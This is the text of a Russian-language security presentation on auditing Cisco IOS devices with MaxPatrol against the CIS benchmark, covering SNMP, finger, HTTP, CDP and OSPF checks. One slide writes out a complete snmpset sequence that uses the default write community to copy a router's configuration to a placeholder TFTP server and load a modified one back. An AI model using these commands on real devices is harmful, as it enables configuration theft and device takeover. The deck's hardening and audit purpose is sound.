Embed Size (px)
DESCRIPTION
Сканирование Cisco IOS в MaxPatrol. Сафронов Илья. What’s the deal?. Безопасность сетевых устройств ( Cisco IOS ) Стандарты безопасности Контроль за соответствием стандартам безопасности. Cisco security hardening. Комплексный подход к безопасности устройств Cisco. - PowerPoint PPT Presentation
Citation preview
Сканирование Cisco IOS в MaxPatrol
Сафронов Илья
What’s the deal?― Безопасность сетевых устройств (Cisco IOS)― Стандарты безопасности― Контроль за соответствием стандартам
безопасности
Cisco security hardening― Комплексный подход к безопасности устройств
Cisco.• Management Plane (управляющий IOS’ом трафик
(SSH, SNMP))• Control Plane (трафик управления сетью (BGP,
STP))• Data Plane ( проходящие сквозь устройство
данные)
Security benchmarking-CIS
Рекомендации и стандарты по безопасности оборудования и ПО.
CIS – Cisco IOS
― Бенчмарк по безопасности для Cisco IOS
CIS – Cisco IOSГруппы проверок:
― AAA― SNMP― Global services (CDP, DHCP, HTTP)― Logging― Neighbor authentication (EIGRP, OSPF, RIP)
Как проверить?― Max Patrol
Чего бояться?
Проверка SNMP
Настройки на устройстве
Угроза – Snmpwalk enumeration
Угроза - Копирование файла конфигурации через SNMP
TFTP-сервер
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address <адрес TFTP-сервера>.snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1
///Возврат модифицированного файла конфигурации (startup-config) //обратно на устройствоsnmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address <адрес TFTP-сервера>.snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-configsnmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1//Перезагрузка устройства для применения изменений
Решение?
Проверка finger
Настройки на устройстве
Угроза – login enumeration
Решение?
Проверка HTTP
Настройки на устройстве
Угроза – кража учетных данных
Решение ?
Проверка CDP
Настройки на устройстве
Угроза - Enumeration через CDP
Решение ?
Аутентификация OSPF
Настройки на устройстве
Угроза – «Отравление» таблиц маршрутизации
Решение?
Кастомный стандарт― Не нравится / не подходит стандарт?― Собери свой!
Заключение― Защищайте свои сетевые устройства― Следите за стандартами безопасности― Регулярно проводите аудит сети
